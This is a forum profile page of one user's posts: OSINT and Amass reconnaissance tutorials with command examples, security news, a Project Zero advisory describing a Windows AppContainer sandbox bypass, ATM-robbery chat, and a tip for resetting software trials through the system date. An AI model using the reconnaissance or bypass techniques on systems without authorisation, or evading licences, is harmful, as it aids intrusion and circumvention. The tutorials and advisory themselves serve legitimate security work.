Everything posted by Kev

  1. Web browser extensions are one of the simplest ways to get started using open-source intelligence tools because they're cross-platform. Anyone using Chrome on Linux, macOS, or Windows can use them all the same, and the same goes for Firefox. One desktop browser add-on, in particular, makes OSINT as easy as right-clicking to search for hashes, email addresses, and URLs.

Mitaka, created by Manabu Niseki, works in Google Chrome and Mozilla Firefox. Once installed, it lets you select and inspect certain pieces of text and indicators of compromise (IoCs), running them through a variety of different search engines, all with just a few clicks. The tool can help investigators identify malware, determine the credibility of an email address, and see if a URL is associated with anything sketchy, to name just a few things.

Installing Mitaka in Your Browser

If you've ever installed a browser extension before, you know what to do. Even if not, it couldn't be easier. Just visit Mitaka in either the Chrome Web Store or Firefox Add-Ons, hit "Add to Chrome" or "Add to Firefox," then select "Add" to verify.

Mitaka: Chrome Extension | Firefox Add-On

Then, once you've found something of interest on a website or in an email that you're investigating, all you need to do is highlight and right-click it, then look through all of the options Mitaka provides in the contextual menu. On the GitHub page for Mitaka, there are a few examples worth trying out to see how well Mitaka works.

Example 1: Inspecting Email Addresses

Whenever you see an email address that you suspect is malicious, whether it's defanged (obfuscated so it can't be clicked) or clickable, you can highlight it, right-click it, then choose "Mitaka." If it's defanged, which usually means putting [.] where regular periods go to break up the link, Mitaka will rearm it so that any search you perform will still work. In the Mitaka menu, you'll see a variety of tools you can use to inspect and investigate the email address.
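Mitaka performs that rearming step for you. As a rough illustration only (this is not Mitaka's actual implementation), the idea of refanging a defanged indicator can be sketched in a few lines of Python:

```python
import re

def refang(indicator: str) -> str:
    """Rearm a defanged indicator so it can actually be searched or resolved.

    Covers a few common obfuscations: [.] or (.) for dots, [@]/[at] for the
    @ in email addresses, and hxxp for http. This is a simplified sketch,
    not an exhaustive list of defanging conventions.
    """
    indicator = indicator.replace("[.]", ".").replace("(.)", ".")
    indicator = indicator.replace("[@]", "@").replace("[at]", "@")
    return re.sub(r"^hxxp", "http", indicator, flags=re.IGNORECASE)

print(refang("phish[@]evil[.]example[.]com"))   # phish@evil.example.com
print(refang("hxxp://evil[.]example[.]com/x"))  # http://evil.example.com/x
```

Whatever you highlight, Mitaka applies this kind of normalization before handing the value to the selected search engine.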
There are searches you can perform on Censys, PublicWWW, DomainBigData, DomainWatch, EmailRep, IntelligenceX, OCCRP, RiskIQ, SecurityTrails, ThreatConnect, ThreatCrowd, and ViewDNS. For example, if you want to learn its email reputation, choose "Search this email on EmailRep." From the results, we can see that test@example.com is probably not one we should trust. In fact, we can see from this report that it's been blacklisted and flagged for malicious activity. So, if we were to find or receive an email address that had been flagged this way, we would very quickly know that it was associated with somebody blacklisted for malware, or possibly something like phishing, which is an excellent way to identify a risky sender or user.

Conversely, let's say we're looking through a breach of different people's passwords, and we want to identify whether or not a real person owns an email address. We can take a properly formed email address, right-click it, select "Mitaka," then use the same EmailRep tool to check. From such a report, we can assume that it's probably a real person, because the email address has been seen in 27 reputable sources on the internet, including Vimeo, Pinterest, and About.me. In the code, we can see all of the information about the different types of high-quality profiles that are linked to the email address, which further legitimizes the account as real.

Example 2: Performing Malware Analysis on Files

Malware analysis is another exciting tool in Mitaka's arsenal. Let's say that we're on a website, and we have a file that we want to download. We've heard of the tool before, it looks reputable, and the web app seems good. Once we download the file, we can compare its hash to the one listed on the site. If the hash matches, we know we downloaded the file the site's author intended, but how do we know that the file is really OK?
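Computing the local file's hash for that comparison takes only a few lines in any language; here's a minimal Python sketch (the file name in the commented usage is a placeholder):

```python
import hashlib

def file_sha256(path: str) -> str:
    """Compute a file's SHA-256 digest, reading in chunks so large
    downloads don't have to fit in memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Hypothetical usage: compare against the hash published on the site.
# if file_sha256("download.bin") == published_hash:
#     print("hash matches the one listed on the site")
```

The same highlighted hash value is what Mitaka passes along to the scanners described next.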
If a virus scanner doesn't catch it on the computer, you can always take the hash of the file that's on the website, right-click it, choose "Mitaka," then use something like VirusTotal. This scanner can identify potentially suspicious files by looking at the hash and trying to find out whether or not it could harm your computer. In our case, we can see that there are multiple detections and that this is a macOS crypto miner. So if we had run this on our computer, it would have gotten through, since it's undetected by Avast and a bunch of other fairly reputable malware scanners. As you can see, Mitaka is a pretty effective way of checking whether a file you encounter on the web has been flagged for doing something bad, using tools like VirusTotal or another data source. Available from the menu for this kind of search are Censys, PublicWWW, ANY.RUN, Apklab, Hashdd, HybridAnalysis, InQuest, Intezer, JoeSandbox, MalShare, Maltiverse, MalwareBazaar, Malwares, OpenTIP, OTX, Pulsedive, Scumware, ThreatMiner, VirusTotal, VMRay, VxCube, and X-Force-Exchange.

Example 3: Checking to See if a Site Is Sketchy

Now, we can also do URL searches with Mitaka. If we're looking at a big data dump, or if we just want to see if a particular URL on a webpage or in an email has been associated with something sketchy, we can right-click the link, choose "Mitaka," then select from one of the tools. Available tools for this kind of search include Censys, PublicWWW, BinaryEdge, crt.sh, DNSlytics, DomainBigData, DomainTools, DomainWatch, FOFA, GoogleSafeBrowsing, GreyNoise, Hashdd, HurricaneElectric, HybridAnalysis, IntelligenceX, Maltiverse, OTX, Pulsedive, RiskIQ, Robtex, Scumware, SecurityTrails, Shodan, SpyOnWeb, Spyse, Talos, ThreatConnect, ThreatCrowd, ThreatMiner, TIP, URLhaus, Urlscan, ViewDNS, VirusTotal, VxCube, WebAnalyzer, and X-Force-Exchange. For our test, let's just check on Censys.
In our case, the domain we searched is associated with some pretty sketchy stuff. Because we can see that it's being used for poor lookups and all sorts of other worrisome activities, we can assume that it's probably not a domain owned by a corporation or company that is straightforward in its dealings; this is just someone looking to make as much money as they can off of the web space that they have. We can also see that it uses an Amazon system, which means that it's probably a rented system and not someone's physical setup. All of this data points to the fact that this would be a very sketchy website to do business with, and it may not be as legitimate as you'd like.

There's a Lot More to Explore!

Those were all pretty basic use cases, but as you can see, there are a ton of different ways we can investigate a clue on the internet using a simple right-click menu. One thing that's really cool about Mitaka is that it detects different types of data, so the contextual search options can cater to the right information. This was just a quick overview. If you want to get started with Mitaka, go through all the different data types: highlight something on a website or in an email, then right-click and choose your Mitaka search. There are a lot of available sources, and it can be overwhelming at first, but that just means Mitaka is a valuable tool with tons of helpful searches available at your fingertips.

Source
  2. Throughout history, human beings have crafted tools as a way to improve people's lives: from stone hammers to metal knives, from rudimentary medical instruments to breakthroughs made with industrial steam machinery, and from the disruption of the transistor and the computer era to today's technology that seems to come straight out of science fiction, like the storage of data in DNA. At the very least, tools allow us to get more work done. Tools afford us time and efficiency, and the security industry is no exception. Security tools are to analysts what optical illusions are to magicians: they yield impressive results in brief periods of time, with a great impact on your audience. These digital instruments open multiple doors to a world of information that would otherwise be difficult to perceive. Today we're introducing you to Amass, a true information-gathering 'Swiss Army knife' for your command-line toolbox. It was originally written by Jeff Foley (currently the Amass Project Leader) and later adopted by the OWASP Foundation.

What is Amass?

Amass is an open source network mapping and attack surface discovery tool that uses information gathering and other techniques, such as active reconnaissance and external asset discovery, to scrape all the available data. To accomplish this, it uses its own internal machinery and also integrates smoothly with different external services to increase its results, efficiency and power. The tool maintains a strong focus on DNS, HTTP and SSL/TLS data discovery and scraping. To do this, it has its own techniques and provides several integrations with different API services like (spoiler alert!) the SecurityTrails API. It also uses different web archiving engines to scrape the bottom of the internet's forgotten data deposits.

Installation

Let's start by installing this tool in our local environment.
While it supports multiple software platforms, more interestingly, it supports different hardware architectures, which means that you could build your own automated box using a small but powerful ARM board (a Raspberry Pi, for instance) or even a mobile phone! Today our focus is to work on a 64-bit PC with Linux, but if you want to test it first and install it later, we strongly suggest you try out the Docker image. To install it from a pre-compiled binary, go to the releases section of their GitHub page. You can access it here, and a screenshot of available zip packages as well as the source code is shown below:

It's very important (especially when using security tools) that you check the integrity of the downloaded binaries, to be sure there has been no tampering whatsoever between what you intended to download and what actually ended up on your hard drive. To do that, you need to save the file amass_checksums.txt, which includes the hash checksums needed to verify the authenticity of the OS binaries. For Amass 3.5.2 (the latest release available at the time of this writing), the checksum file has the following contents:

As in this analysis we're using Linux on an amd64 CPU architecture, we are only verifying this hash (you can skip this step if you want, but running the check against the full file will output several "No such file…" errors). To do so, we must first remove all non-corresponding hashes from the file, and invoke the following command:

$ shasum -c amass_checksums.txt
amass_v3.5.2_linux_amd64.zip: OK

With that result, we can be assured that the binary is correct and that there were no file modifications while it was downloading. Simply fetch the desired .zip file (in our case that would be amass_v3.5.2_linux_amd64.zip), uncompress it and enter the newly created folder (amass_v3.5.2_linux_amd64).
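Instead of hand-editing the checksum file to silence the "No such file…" errors, you can pull out just the entry for your platform and verify it yourself. A small sketch of that idea in Python (assuming the checksums file uses SHA-256 digests in the usual "digest  filename" layout):

```python
import hashlib

def expected_checksum(checksums_text: str, filename: str) -> str:
    """Return the digest listed for `filename` in a shasum-style
    checksums file, where each line is "<digest>  <filename>"."""
    for line in checksums_text.splitlines():
        parts = line.split()
        if len(parts) == 2 and parts[1] == filename:
            return parts[0]
    raise KeyError(f"{filename} not listed in checksums file")

def verify(path: str, checksums_text: str) -> bool:
    """Check a downloaded archive against its listed SHA-256 digest."""
    digest = hashlib.sha256(open(path, "rb").read()).hexdigest()
    return digest == expected_checksum(checksums_text, path)
```

This does the same job as filtering amass_checksums.txt down to one line before running `shasum -c`, but without touching the original file.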
In it you will see different files and folders; the executable is called "amass", and when you run it, you'll see this:

This would be the end of the installation, but if you want it to be part of your $PATH, just move the amass binary to your favourite executables folder.

First steps

Let's take a look at the subcommands so we can check out the power of this tool:

Subcommands:
	amass intel - Discover targets for enumerations
	amass enum - Perform enumerations and network mapping
	amass viz - Visualize enumeration results
	amass track - Track differences between enumerations
	amass db - Manipulate the Amass graph database
	amass dns - Resolve DNS names at high performance

We are going to explain briefly what they do and how to activate them, and note a few of them while trying to dig a little deeper than the official tutorial or user guide, for both fun and educational purposes!

Presentation by obfuscation

One particularly handy option of the intel subcommand is the -demo flag, which lets us output results in an obfuscated manner. This way, we can make presentations without revealing too much information about our targets. In this example we are conducting an intelligence-gathering action and obtaining an obfuscated output via the -demo flag, which replaces TLDs and ccTLDs with 'x' characters:

$ amass intel -asn 6057 -demo
adsl.xxxxxxxxx.xxx.xx ancel.xxx.xx ir-static.xxxxxxxxx.xxx.xx algorta.xxx.xx estudiocontable.xxx.xx fielex.xxx.xx ain.xxx.xx vyt.xxx.xx com.xx cx2sa.xxx easymail.xxx.xx mor-inv.xxx catafrey.xxx kernel.xxx.xx bglasesores.xxx sislersa.xxx arpel.xxx.xx copab.xxx.xx spefar.xxx aitacargas.xx duprana.xx sua.xxx.xx gruporovira.xxx exterior.xxxxx.xxx lideco.xxx seaairforwarders.xxx flp.xx acac.xxx.xx cerrolargo.xxx.xx esquemas.xxx

Autonomous system number inquiry

Autonomous systems are the true guardians of internet communications.
They know exactly how your traffic can reach a certain destination by receiving and advertising routing information. If this sounds at all interesting, let us tell you: it is. Let's dive in, in a little more detail. Every organization connected to the internet with IP ranges to advertise, or that wants multihomed broadband connections (for example, "I'm a cloud provider, and want to advertise my own delegated IP range to two different ISPs"), should have an autonomous system (AS for short). An autonomous system number (abbreviated as ASN) is the ID number of this AS, given by your region's NIC authority (you can find more information on this topic in our previous article about ASN Lookup).

So what could you possibly do with this command? For one thing, you could dig up all the domain names associated with an entire ASN: that means a complete cloud provider (e.g., Google and Microsoft have their own ASNs), an entire mega-company (Apple, Akamai and Cloudflare also have their own ASNs), or an entire ISP (internet service providers of all sizes have ASNs, even the medium-sized and smaller ones). Internet exchanges and regional internet registries (IXs and RIRs, respectively) also have associated AS numbers.

So how can we perform an ASN check? Once you have your target's ASN, you can find out what's in there, as in the following example:

$ amass intel -asn 28000
labs.lacnic.net
lacnic.net.uy
lactld.org
dev.lacnic.net
lacnic.net
lacnog.org
net.uy
lacnog.lat
ripe.net

Here we have just queried the LACNIC (Latin American and Caribbean RIR) ASN; now we'll try with the RIPE (Europe, Middle East and Central Asia RIR) ASN:

$ amass intel -asn 25152
root-servers.net

Despite the few results, those domains (especially the last one, corresponding to RIPE's ASN) are some of the most important names on the internet (check out our piece on DNS Root Servers). Great! What else can we do with this tool? Let's find AS numbers by way of description.
This is incredibly useful, as you can get records quickly and avoid gathering data manually by looking at companies' websites, looking glass tools, and more. Following the previous example, we'll look at some of the AS numbers for the other existing RIRs (hint: ARIN corresponds to North America, AFRINIC to Africa, and APNIC to Asia-Pacific and Oceania):

ARIN Results

$ amass intel -org ARIN
3856, PCH-AS - Packet Clearing House
3914, KMHP-AS-ARIN - Keystone Mercy Health Plan
4441, MARFORPACDJOSS - Marine Forces Pacific
6656, STARINTERNET
6702, APEXNCC-AS Gagarina avenue
6942, CLARINET - ClariNet Communications Corporation
7081, CARIN-AS-BLOCK - ISI
7082, CARIN-AS-BLOCK - ISI
7083, CARIN-AS-BLOCK - ISI
7084, CARIN-AS-BLOCK - ISI
7085, CARIN-AS-BLOCK - ISI
9489, KARINET-AS Korea Aerospace Research Institute
10034, GARAK-AS-KR SEOUL AGRICULTURAL & MARINE PRODUCTS CORP.
10056, HDMF-AS Hyundai Marin & Fire Insurance
10065, KMTC-AS-KR Korea Marine Transport
10309, MARIN-MIDAS - County of Marin
10439, CARINET - CariNet
10715, Universidade Federal de Santa Catarina
10745, ARIN-ASH-CHA - ARIN Operations
10927, PCH-SD-NAP - Packet Clearing House
11179, ARYAKA-ARIN - Aryaka Networks
11187, GWS-ARIN-AS - Global Web Solutions
11228, ARINC - ARINC
11242, Universidade Federal de Santa Catarina

AFRINIC Results

$ amass intel -org AFRINIC
33764, AFRINIC-ZA-JNB-AS
37177, AFRINIC-ANYCAST
37181, AFRINIC-Anycast-RFC-5855
37301, AFRINIC-ZA-CPT-AS
37708, AFRINIC-MAIN
131261, AFRINIC-AS-AP Temporary assignment due to software testing

APNIC Results

$ amass intel -org APNIC
4608, APNIC-SERVICES Asia Pacific Network Information Centre
4777, APNIC-NSPIXP2-AS Asia Pacific Network Information Centre
9450, WEBEXAPNIC-AS-AP Webex Communications Inc
9838, APNIC-DEBOGON-AS-AP APNIC Debogon Project
17821, APNICTRAINING-ISP ASN for APNICTRAINING LAB ISP
18366, APNIC-ANYCAST-AP ANYCAST AS
18367, APNIC-UNI1-AP UNICAST AS of ANYCAST node(Hongkong)
18368, APNIC-SERVICES APNIC DNS Anycast
18369, APNIC-ANYCAST2 APNIC ANYCAST
18370, APNIC-UNI4-AP UNICAST AS of ANYCAST node(Other location)
23659, HEITECH-AS-AP APNIC HEITECH ASN
24021, APNICRANDNET-TUI-AU TUI experiment
24555, APRICOT-APNIC-ASN ASN used for conferences in AP region
38271, CSSL-APNIC-2008-IN CyberTech House
38610, APNIC-JP-RD APNIC R&D Centre
38905, CPHAPNIC-AS-AP Consolidated Press Holdings Limited
45163, APNICRANDNET-TUI2-AU TUI experiment
45192, APNICTRAINING-DC ASN for APNICTRAINING LAB DC
55420, SABAHNET-AS-AP APNIC ASN Block

This set of outputs shows us which AS numbers have a description matching our search criteria, which is extremely useful and fast!

Other intel capabilities include reverse WHOIS queries and active reconnaissance. On this last topic, the -active flag performs a proactive check against additional sources of information: it inspects the server's active SSL/TLS certificates and reports what it finds there (enabling the -src flag also shows which source of information produced each result).

$ amass intel -addr 8.8.8.8 -src
[Reverse DNS] dns.google

$ amass intel -active -addr 8.8.8.8 -src
[Reverse DNS] dns.google
[Active Cert] dns.google.com
[Active Cert] 8888.google

The intel subcommand provides different ways to output information and to make further checks, like port scanning; you can find more details in the GitHub documentation page.

Reconnaissance

How about plain and simple DNS record enumeration? Amass provides this via the enum subcommand, which queries multiple different sources of information to check for the existence of domain-related subdomains. In the image below you can see the different backends this tool relies on to find information. Some of them are quite peculiar, as in the case of the Pastebin website check. Now here's an example of how adding an ASN to the query can obtain additional information.
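If you're scripting around amass, the source-annotated lines that -src produces are easy to post-process. A quick Python sketch that splits such lines into (source, name) pairs, using the reverse-DNS output from the intel run above as sample input:

```python
import re

# Matches amass '-src' output lines of the form "[Source Name] hostname".
SRC_LINE = re.compile(r"^\[(?P<source>[^\]]+)\]\s+(?P<name>\S+)$")

def parse_src_output(text: str):
    """Split amass '-src' output lines like '[Reverse DNS] dns.google'
    into (source, name) tuples, skipping anything that doesn't match."""
    pairs = []
    for line in text.splitlines():
        match = SRC_LINE.match(line.strip())
        if match:
            pairs.append((match.group("source"), match.group("name")))
    return pairs

sample = """[Reverse DNS] dns.google
[Active Cert] dns.google.com
[Active Cert] 8888.google"""
print(parse_src_output(sample))
# [('Reverse DNS', 'dns.google'), ('Active Cert', 'dns.google.com'), ('Active Cert', '8888.google')]
```

From there you can group results by source, count hits, or feed the names into further checks.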
In the first query we explicitly added the AS number, and in the second query it was removed. The results speak for themselves:

$ amass enum -asn 28000 -d lacnic.net

$ amass enum -d lacnic.net

To summarize: adding context (e.g., an ASN) can help you get more information from your query.

Scraping unpublished subdomains

Sometimes subdomains won't show up. They may be largely inactive, and when queried, their activity stays far below the radar. So how do we get them? Meet subdomain brute forcing. This technique lets us bring our own custom wordlist and try it against the configured domain name, in an attempt to discover unseen subdomains. In this case, we are going to guess…

$ amass enum -brute -src -d ripe.net -demo

The output will look similar to this:

Tracking

Is there anything really static on the internet? Well, there are no simple answers to this question. The volatility of DNS records, BGP routes, and IP space on the internet is astonishing. In this scenario, we will use the track subcommand to see exactly what has changed between our previous checks. The results may surprise you: apparently, in a window of roughly six hours, two subdomains' AAAA records were removed. The track subcommand allows us to match information between checks and output the difference between them, so you can get an idea of how quickly a target is moving. For more detail, you can add the -history flag, which will output different time frames and activity. The following example uses the -history flag, so you can see how the output will look:

Wait, there's data storage too?

The short answer is yes. Amass implements a graph database that can be queried after every check to see which records have been modified, and to speed up query results. The following command will give us a summary of the data we've collected, showing the sources of information ordered by ASN and IP range, in conjunction with a list of the domains and subdomains discovered.
$ amass db -show

To perform further data analysis, it's helpful to get a unique identification number that will let you trace the different checks you have made (it helps when trying to filter and visualize data later). To get this ID you'll need to run the following:

Then, if desired, you can get a summary, or the full output, regarding the investigation. For the sake of brevity, let's just do a summary output of index number 1, corresponding to the ripe.net analysis:

Visualization

If you've come this far, you probably have an overall idea of the power of this tool, and you're probably plenty excited about the data outputs and the colourful shell results as well! But what if you want to extract these findings and take them to the next level? Perhaps you want to show your target's ecosystem and make a nice presentation of it. If that's the case, Amass has you covered. Let's meet the viz subcommand. The image you see below is one of the possible outputs. To gain some insight: the small red dot at the center corresponds to the ripe.net domain, and the satellites connected to it are different objects representing associated data such as IP addresses, DNS records, etc. You can zoom in to see what all this is composed of, namely:

Red dots - domain names
Green dots - subdomain names
Yellow dots - reverse pointer records
Orange dots - IP addresses (v4 & v6)
Purple dots - mail exchanger records (MX)
Cyan dots - nameserver records (NS)
Blue dots - autonomous system numbers (ASNs)
Pink dots - IP netblocks

As you zoom in on this example, your visualization will look like the one below. And if you want to look at (almost) the whole ecosystem, you can zoom out to see the "big picture". You can make your own visualization, focused on a specific analysis.
Now we take the index identification number (8) obtained in the previous section and open the output file that we need to visualize:

$ amass viz -enum 8 -d3

The animated visualization HTML file will look similar to this:

What about API integrations?

While it may seem like this tool has no need for configuration files, that's not entirely true. When an API interaction is needed, you'll want to save your keys somewhere convenient so you can use this feature recurrently. To do that, we are going to set up an Amass configuration file with the necessary information for the APIs to work, and throw down some commands to see how the tool behaves. We can start by downloading an example configuration file from this link. Config files should be placed in the locations stated in the following table, depending on your deployment:

You can also point to a different config file for testing purposes with the -config flag. When it comes to enabling an API key, it's pretty straightforward. Just uncomment the desired API section and place your SecurityTrails-provided API key:

[SecurityTrails]
apikey = YOUR_API_KEY

Then simply invoke the desired command, using the config file with the API key in it, in our case:

We can see that the SecurityTrails API integration is enabled; now let's see if we can get any results by using it:

Great! You've just learned how to enable an API key and execute a query using it. If you need more information, just look into the config file for more useful data about integrations and third-party services.

Summary

While this tool is an amazing resource for finding data about any target, it's somewhat vague in its documentation and in how it actually works. Of course, you're probably thinking, "Why do I need to know how they do it?", but understanding how it gathers data according to a determined method makes it easier to determine how accurate the results are.
You could be obtaining a domain associated with a given ASN that bears no logical relation at first sight, without a proper explanation, yet it's still listed. If you search in the most common places, such as WHOIS, DNS (A, MX, TXT) or reverse pointer (rDNS or PTR) records, you won't easily find a good reason for its appearance in the output. Of course, if you're familiar with Golang, you can read first-hand how it's been created, and yes, the -src flag can shed light on where data is pulled from, but if you're not up for a source code review, a little more in-depth documentation (explaining how every check works) would be really nice. All in all, know this: Amass should definitely be included in your security toolbox.

Source
  3. I know; I have friends with shops that move at least 20,000 RON daily. What matters is where the bills came from and their serial numbers; banks usually sort them by series, so if the series are repetitive and the bills are dirty, it can be traced easily.

Edit: that's assuming there's nothing rotten going on. There have been cases where pawn-shop owners robbed themselves for the insurance.

Edit 2: there are CCTV cameras at every pedestrian crossing. The head of the post office was probably eating doughnuts. They surely took their masks off once they left, changed clothes, and so on.
  4. DarkWeb

    It was a 404 when Marcus Hutchins was locked up; he had a profile there, but at some point it was "hidden". I know what "helicopters" means.
  5. Microsoft today released updates to remedy nearly 130 security vulnerabilities in its Windows operating system and supported software. None of the flaws are known to be currently under active exploitation, but 23 of them could be exploited by malware or malcontents to seize complete control of Windows computers with little or no help from users. The majority of the most dangerous or "critical" bugs deal with issues in Microsoft's various Windows operating systems and its web browsers, Internet Explorer and Edge. September marks the seventh month in a row Microsoft has shipped fixes for more than 100 flaws in its products, and the fourth month in a row that it fixed more than 120.

Among the chief concerns for enterprises this month is CVE-2020-16875, which involves a critical flaw in the email software Microsoft Exchange Server 2016 and 2019. An attacker could leverage the Exchange bug to run code of his choosing just by sending a booby-trapped email to a vulnerable Exchange server. Also not great for companies to have around is CVE-2020-1210, a remote code execution flaw in supported versions of Microsoft SharePoint document management software that bad guys could attack by uploading a file to a vulnerable SharePoint site. Security firm Tenable notes that this bug is reminiscent of CVE-2019-0604, another SharePoint problem that's been exploited for cybercriminal gains since April 2019. Microsoft fixed at least five other serious bugs in SharePoint versions 2010 through 2019 that also could be used to compromise systems running this software. And because ransomware purveyors have a history of seizing upon SharePoint flaws to wreak havoc inside enterprises, companies should definitely prioritize deployment of these fixes, says Alan Liska, senior security architect at Recorded Future.
Todd Schell at Ivanti reminds us that Patch Tuesday isn't just about Windows updates: Google has shipped a critical update for its Chrome browser that resolves at least five security flaws rated high severity. If you use Chrome and notice an icon featuring a small upward-facing arrow inside of a circle to the right of the address bar, it's time to update. Completely closing out Chrome and restarting it should apply the pending updates.

Once again, there are no security updates available today for Adobe's Flash Player, although the company did ship a non-security software update for the browser plugin. The last time Flash got a security update was June 2020, which may suggest researchers and/or attackers have stopped looking for flaws in it. Adobe says it will retire the plugin at the end of this year, and Microsoft has said it plans to completely remove the program from all Microsoft browsers via Windows Update by then.

Before you update with this month's patch batch, please make sure you have backed up your system and/or important files. It's not uncommon for Windows updates to hose one's system or prevent it from booting properly, and some updates have even been known to erase or corrupt files. So do yourself a favor and back up before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there's a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.

Source
  6. Try it on a new device; it probably leaves signatures in DLLs somewhere. If a re-install doesn't work: install it, set the same date, and when you restart it, set the date back to the day you installed it (offline).
  7. DarkWeb

    I was NOT drunk. Get in if you can; it's a 404 hidden shell.
  8. Dude, understand: there's nothing they can do with the money. Let's assume what Pacalici said is true, that the cassettes were sealed. Fine, but then how does the money come out through the slot? They have openings through which the "ink" is injected in case of a blast. It all ties together; you'll see for yourself.
  9. The StorageFolder class, when used out of process, can bypass security checks to read and write files not allowed to an AppContainer.

Windows: StorageFolder Marshaled Object Access Check Bypass EoP
Platform: Windows 10 2004/1909
Class: Elevation of Privilege
Security Boundary: AppContainer

Summary: The StorageFolder class when used out of process can bypass security checks to read and write files not allowed to an AppContainer.

Description: When a StorageFolder object is passed between processes it's custom marshaled using the CStorageFolderProxy class (CLSID: a5183349-82de-4bfc-9c13-7d9dc578729c) in windows.storage.dll. The custom marshaled data contains three values: a standard marshaled OBJREF for a Proxy instance in the originating process, a standard marshaled OBJREF for the original CStorageFolder object, and a Property Store. When the proxy is unmarshaled, the CStorageFolderProxy object is created in the client process; this redirects any calls to the storage interfaces to the creating process's CStorageFolder instance. The CStorageFolder will check access based on the COM caller. However, something different happens if you call a method on the marshaled Proxy object. The call will be made to the original process's Proxy object, which will then call the real CStorageFolder method. The problem is that the Proxy and the real object are running in different apartments: the Proxy in the MTA and the real object in a STA. This results in the call to the real object being cross-apartment marshaled, which breaks the call context for the thread as it's not passed to the other apartment. As shown in a rough diagram:

[ Client (Proxy::Call) ] => [ Server [ MTA (Proxy::Call) ] => [ STA (Real::Call) ] ]

As the call context is only captured by the real object, this results in the real object thinking it's being called by the same process, not the AppContainer process.
If the process hosting the StorageFolder is more privileged this can result in being able to read/write arbitrary files in specific directories. Note that CStorageFile is similarly affected, but I'm only describing CStorageFolder. In any case it's almost certainly the shared code which is a problem. I've no idea why the classes aren't using the FTM, perhaps they're not marked as Agile? If they were then the real object would be called directly and so would still be running in the original caller's context. Even if the FTM was enabled and the call context was maintained it's almost certainly possible to construct the proxy in a more privileged, but different process because of the asymmetric nature of the marshaling, invoke methods in that process which will always have to be performed out of process. Fixing wise, firstly I don't think the Proxy should ever end up standard marshaled to out of process callers, removing that might help. Also when a call is made to the real implementation perhaps you need to set a Proxy Blanket or enable dynamic cloaking and impersonate before the call. There does seem to be code to get the calling process handle as well, so maybe that also needs to be taken into consideration? This code looks like it's copied and pasted from SHCORE which is related to the bugs I've already reported. Perhaps the Proxy is not supposed to be passed back in the marshal code, but the copied code does that automatically? I'd highly recommend you look at any code which uses the same CFTMCrossProcClientImpl::_UnwrapStream code and verify they're all correct. Proof of Concept: I've provided a PoC as a C# project. The code creates an AppContainer process (using a temporary profile). It then uses the Partial Trust StorageFolderStaticsBrokered class, which is instantiated OOP inside a RuntimeBroker instance. The class allows opening a StorageFolder object to the AC profile's Temporary folder. 
The StorageFolderStaticsBrokered class is granted access to any AC process, as well as the "lpacAppExperience" capability, which means it also works from Classic Edge LPAC. The PoC then uses the IStorageItem2::GetParentAsync method to walk up the directory hierarchy until it reaches %LOCALAPPDATA%. It can't go any higher than that, as there seems to be some restriction in place, probably because it's the base location for package directories. The code then writes an arbitrary file abc.txt to the Microsoft sub-directory. Being able to read and write arbitrary files in the user's Local AppData is almost certainly enough to escape the sandbox, but I've not put that much time into it.

1) Compile the C# project. It will need to grab NtApiDotNet from NuGet to work.
2) Run the PoC executable.

Expected Result: Accessing files outside of the AppContainer's directory is blocked.
Observed Result: An arbitrary file is written to the %LOCALAPPDATA%\Microsoft directory.

This bug is subject to a 90-day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2020-09-23. Disclosure at an earlier date is also possible if agreed upon by all parties.

Related CVE Numbers: CVE-2020-0886.
Found by: forshaw@google.com
Download: GS20200908185407.tgz (18 KB)
Source
  10. You've latched onto Maria and Marian again... it's a pain with this editor, I'm writing without ASCII.
  11. Nytro, those Ariel pads I was telling you about contain a particular acid that dissolves certain elements; whether euros or dollars, it shows clearly under UV. PS: the pounds are all plastic.
  12. "It happens at bigger houses too": https://www.ecb.europa.eu/euro/banknotes/ink-stained/html/index.en.html
  13. Complex workflows: Titanoboa is a platform for creating complex workflows on the JVM. Due to its generic, distributed and easily extensible design, you can use it for a wide variety of purposes: as an Enterprise Service Bus (ESB), as a full-featured iPaaS / Integration Platform, for Big Data processing, for IT Automation, for Batch Processing, or for Data Transformations / ETL. Your workflow graph can even be cyclic! We don't care. In Titanoboa workflows you can execute your steps sequentially or in parallel, then join parallel threads back together whenever you wish. Each step can be handled transactionally to make sure it really did run. If things go south, you can let the step retry automatically, or just catch errors and handle them as you wish... Screenshots: Download Trial Source
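The parallel-execution, join, and automatic-retry ideas described above can be sketched generically. This is a plain-Python illustration of the concepts, not Titanoboa's actual (Clojure/JVM) API:

```python
from concurrent.futures import ThreadPoolExecutor

def with_retry(fn, attempts=3):
    """Re-run a failing step automatically, up to `attempts` tries."""
    def wrapped(*args):
        for i in range(attempts):
            try:
                return fn(*args)
            except Exception:
                if i == attempts - 1:
                    raise  # out of retries: surface the error
    return wrapped

def double(x):
    return x * 2

step = with_retry(double)

# Run two branches of the workflow in parallel, then join them back together.
with ThreadPoolExecutor() as pool:
    a = pool.submit(step, 1)
    b = pool.submit(step, 2)
    joined = a.result() + b.result()

print(joined)  # 6
```

A real workflow engine would additionally persist step state so a crashed step can be replayed, which is what the transactional handling above refers to.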
  14. Anyway, they can't do anything with the money (if they're the new series); at the first shock the Ariel pads burst, they'll fight among themselves, the cretins will get themselves caught.
  15. This includes all the source material for the 20 lessons of what was previously a commercial online Linux server admin course - now free for you to learn with! If you spot any typos or "dead links" simply raise a GitHub "issue" against this project. You are free to use this under the terms of the license, but copyright remains with the author. Steve Download: git clone https://github.com/snori74/linuxupskillchallenge.git Source
  16. They were still Excel documents. Just not your typical Excel files. Enough to trick some security systems, though. A newly discovered malware gang is using a clever trick to create malicious Excel files that have low detection rates and a higher chance of evading security systems. Discovered by security researchers from NVISO Labs, this malware gang — which they named Epic Manchego — has been active since June, targeting companies all over the world with phishing emails that carry a malicious Excel document. But NVISO said these weren't your standard Excel spreadsheets. The malicious Excel files were bypassing security scanners and had low detection rates.

Malicious Excel files were compiled with EPPlus

